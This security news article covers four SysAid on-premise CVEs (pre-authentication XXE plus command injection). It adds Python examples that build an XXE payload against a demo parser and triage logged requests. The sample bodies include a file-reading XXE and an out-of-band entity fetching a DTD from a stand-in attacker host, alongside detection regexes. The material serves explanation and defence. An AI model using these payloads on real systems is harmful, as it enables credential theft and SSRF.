SysAid Addresses Four Critical Vulnerabilities Allowing Pre-Authentication Remote Code Execution in On-Premise Deployment


Security researchers have disclosed several vulnerabilities in the on-premise version of the SysAid IT support software. Chained together, the flaws could allow an unauthenticated attacker to achieve remote code execution with elevated privileges.

Three of the vulnerabilities, CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777, are XML External Entity (XXE) injections. XXE arises when an application's XML parser resolves entity declarations supplied in attacker-controlled input, so that a DTD embedded in the request body can direct the parser to read local files or fetch remote URLs.

Exploiting them lets an attacker inject unsafe XML entities into the web application, which yields local file disclosure and Server-Side Request Forgery (SSRF) and, in some cases, remote code execution.
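To make the mechanism concrete, the following is an added example written for this page; it is not SysAid's code and not watchTowr's exploit. A small Python xml.sax parser stands in for an XML-consuming endpoint like the check-in handler discussed here, parsed once with external general entities enabled (the XXE-prone configuration) and once hardened. The file name InitAccount.cmd is borrowed from the article, but its location and contents below are constructed, as is the check-in body.

```python
import io
import os
import re
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects every run of character data the parser delivers, including
    text pulled in through an expanded external entity."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def parse_vulnerable(body: bytes) -> str:
    """XXE-prone configuration: external general entities are resolved, so a
    SYSTEM entity in the request's DTD is fetched (local file or URL) and
    its contents are spliced into the document as ordinary text."""
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, True)  # the dangerous setting
    parser.parse(io.BytesIO(body))
    return handler.text()


def parse_hardened(body: bytes) -> str:
    """Two layers of defence: refuse any document that carries a DOCTYPE, so
    no entities can be declared at all, and keep external general entity
    resolution off (Python's default since 3.7.1). The DOCTYPE check is a
    byte-level pre-filter; the keyword is case-sensitive in XML."""
    if re.search(rb"<!DOCTYPE", body):
        raise ValueError("DTD not allowed in check-in payload")
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, False)
    parser.parse(io.BytesIO(body))
    return handler.text()


def write_fake_secret_file() -> str:
    """Constructed stand-in for InitAccount.cmd: only the name and the fact
    that it holds admin credentials come from the article."""
    path = os.path.join(tempfile.mkdtemp(), "InitAccount.cmd")
    with open(path, "wb") as fh:
        fh.write(b"admin_user=administrator\nadmin_password=CONSTRUCTED-P@ssw0rd\n")
    return path


def xxe_payload(target_path: str) -> bytes:
    """Classic in-band XXE body: declare an external entity that points at a
    local file, then reference it where the server echoes or stores text."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE checkin [ <!ENTITY xxe SYSTEM "{target_path}"> ]>\n'
        '<checkin><device>&xxe;</device></checkin>'
    ).encode()


def demo() -> dict:
    """Run the same payload through both parsers and report the outcome."""
    body = xxe_payload(write_fake_secret_file())
    leaked = parse_vulnerable(body)
    try:
        parse_hardened(body)
        blocked = False
    except ValueError:
        blocked = True
    return {"leaked": leaked, "blocked": blocked}


if __name__ == "__main__":
    result = demo()
    print("vulnerable parser returned:", repr(result["leaked"]))
    print("hardened parser rejected the payload:", result["blocked"])
```

The vulnerable path returns the fake credential file verbatim as element text, which is exactly how a pre-authentication read of InitAccount.cmd turns into administrative access. Rejecting DOCTYPE outright is the simpler fix than enumerating entity types; the same rule is expressed in Java parsers through `disallow-doctype-decl`, and in any parser the external-entity feature should stay disabled for untrusted input.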

Details regarding the vulnerabilities, as reported by researchers at watchTowr Labs, are as follows:
– CVE-2025-2775 and CVE-2025-2776 involve pre-authenticated XXE through the /mdm/checkin endpoint.
– CVE-2025-2777 concerns a pre-authenticated XXE through the /lshw endpoint.

Researchers have noted that these vulnerabilities are straightforward to exploit via specially crafted HTTP POST requests directed at the vulnerable endpoints.

Successful exploitation allows an attacker to read local files containing sensitive data, including SysAid's "InitAccount.cmd," which holds the administrator username and plaintext password created during installation. With those credentials, the attacker gains full administrative access to the SysAid instance.

The XXE vulnerabilities can also be chained with a separate command injection vulnerability, CVE-2025-2778, to achieve remote code execution.

SysAid addressed all four vulnerabilities in on-premise version 24.4.60 b16, released in early March 2025. A proof-of-concept exploit chaining the vulnerabilities has since been published.
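Two checks an operator is likely to want after reading the above, as an added example that is not code from SysAid, watchTowr, or this article: a triage pass over proxy or WAF records of POST requests to the two endpoints named above, looking for DTD constructs in the body, and a version comparison against the fixed build. The record layout, the addresses and the request bodies are constructed; the placeholder file path does not claim to be where InitAccount.cmd lives; the regular expressions are signatures of the XXE technique rather than of a specific exploit; and the assumption that every build newer than 24.4.60 b16 carries the fix is mine.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Endpoints the advisory names as reachable without authentication.
ADVISORY_ENDPOINTS = {"/mdm/checkin", "/lshw"}

# DTD constructs a device check-in or hardware-inventory body has no reason
# to carry. Signatures of the XXE technique, not of one exploit.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b")
EXTERNAL_ENTITY_RE = re.compile(rb"<!ENTITY\s+(?:%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\b")
PARAM_ENTITY_REF_RE = re.compile(rb"%[\w.-]+;")

# Fixed on-premise build per the advisory: 24.4.60 b16.
FIXED_BUILD = (24, 4, 60, 16)
VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)(?:\s*b(\d+))?\s*$", re.IGNORECASE)


@dataclass
class Request:
    """Constructed record shape: what a reverse proxy or WAF that logs
    request bodies might hand to a hunting script."""
    src_ip: str
    method: str
    path: str
    body: bytes


def normalize_path(path: str) -> str:
    """Drop the query string and trailing slash; compare case-insensitively."""
    return path.split("?", 1)[0].rstrip("/").lower() or "/"


def classify(req: Request) -> Tuple[str, List[str]]:
    """Return (verdict, reasons):
    xxe_attempt  POST whose DTD declares an external entity or references a
                 parameter entity, the building blocks of the XXE described above
    dtd_present  POST with a DOCTYPE but neither construct; unusual, worth a look
    benign       anything else (non-POST, or no DTD in the body)"""
    if req.method.upper() != "POST" or not DOCTYPE_RE.search(req.body):
        return "benign", []
    path = normalize_path(req.path)
    reasons = [f"DOCTYPE in POST body from {req.src_ip}"]
    if path in ADVISORY_ENDPOINTS:
        reasons.append(f"targets advisory endpoint {path}")
    external = EXTERNAL_ENTITY_RE.search(req.body) is not None
    param_ref = PARAM_ENTITY_REF_RE.search(req.body) is not None
    if external:
        reasons.append("external (SYSTEM/PUBLIC) entity declared")
    if param_ref:
        reasons.append("parameter entity referenced (%name;)")
    return ("xxe_attempt" if external or param_ref else "dtd_present"), reasons


def triage(requests: List[Request]) -> List[Tuple[str, List[str]]]:
    return [classify(r) for r in requests]


def parse_version(text: str) -> Tuple[int, int, int, int]:
    """Parse SysAid's 'major.minor.patch bNN' form; a missing build counts as 0."""
    m = VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised SysAid version string: {text!r}")
    major, minor, patch, build = m.groups()
    return int(major), int(minor), int(patch), int(build or 0)


def is_patched(text: str) -> bool:
    """True for 24.4.60 b16 and later. Assumption (mine, not the advisory's):
    every later build keeps the fix."""
    return parse_version(text) >= FIXED_BUILD


# Constructed sample traffic (RFC 5737 addresses, invented bodies).
SAMPLE_REQUESTS = [
    # in-band XXE: external entity pointing at a local file (placeholder path)
    Request("203.0.113.7", "POST", "/mdm/checkin",
            b'<?xml version="1.0"?><!DOCTYPE c [<!ENTITY xxe SYSTEM '
            b'"file:///path/to/InitAccount.cmd">]><checkin><udid>&xxe;</udid></checkin>'),
    # out-of-band variant: parameter entity fetches an attacker-hosted DTD (SSRF)
    Request("203.0.113.7", "POST", "/lshw?v=1",
            b'<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://203.0.113.9/x.dtd"> %dtd;]><r/>'),
    # ordinary check-in, no DTD at all
    Request("198.51.100.4", "POST", "/mdm/checkin", b"<checkin><udid>A1B2</udid></checkin>"),
    # not a POST; the advisory describes POST bodies
    Request("198.51.100.4", "GET", "/mdm/checkin", b""),
    # DOCTYPE with only an internal entity: not the XXE pattern, still unusual
    Request("198.51.100.9", "POST", "/mdm/checkin",
            b'<!DOCTYPE c [<!ENTITY v "1.0">]><checkin><ver>&v;</ver></checkin>'),
]

if __name__ == "__main__":
    for req, (verdict, reasons) in zip(SAMPLE_REQUESTS, triage(SAMPLE_REQUESTS)):
        print(f"{req.method} {req.path:<14} -> {verdict}: {'; '.join(reasons)}")
    for v in ("24.4.59 b40", "24.4.60 b15", "24.4.60 b16", "24.4.61"):
        print(f"{v:<12} patched: {is_patched(v)}")
```

Only a log source that retains request bodies can feed this; a plain access log shows the POST to /mdm/checkin or /lshw but not the DTD inside it, so in that case the fallback is to flag every unexpected external POST to those two paths and pull the matching body from the WAF or a packet capture.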

Earlier SysAid flaws, such as CVE-2023-47246, have been exploited by ransomware groups, so on-premise customers should update to the latest version without delay. Because the XXE flaws expose the installation-time administrator password, organisations that ran a vulnerable build reachable from untrusted networks should also rotate that password and review administrative activity rather than stop at patching.